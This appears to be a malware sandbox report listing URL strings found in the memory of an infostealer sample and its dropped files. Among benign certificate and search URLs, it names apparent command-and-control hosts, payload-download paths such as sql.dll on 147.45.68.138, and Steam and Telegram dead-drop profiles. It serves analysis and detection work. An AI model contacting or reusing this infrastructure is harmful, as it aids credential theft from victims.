Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/sql.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/sql.dllLbz
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/sql.dllurer
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/u~
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138/vcruntime140.dll
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80790dee73nt-Disposition:
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:808/2024
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80AE
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80AFsrss.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80CA
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80e
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80form-data;
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80hellohttps://steamcommunity.com/profiles/76561199761128941b
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://147.45.68.138:80ocal
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.com
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.com/
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
Source: Amcache.hve.19.dr String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134269337.000000001D4AD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFIDH.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: AKFIDH.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AKFIDH.2.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AKFIDH.2.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: AKFIDH.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFIDH.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AKFIDH.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHJKJD.2.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr String found in binary or memory: https://mozilla.org0/
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: EBKJDB.2.dr String found in binary or memory: https://support.mozilla.org
Source: EBKJDB.2.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EBKJDB.2.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JEGHJD.2.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JEGHJD.2.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/iyigunl
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000104D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://traineiwnqo.shop/
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://traineiwnqo.shop/api
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://traineiwnqo.shop/apibu
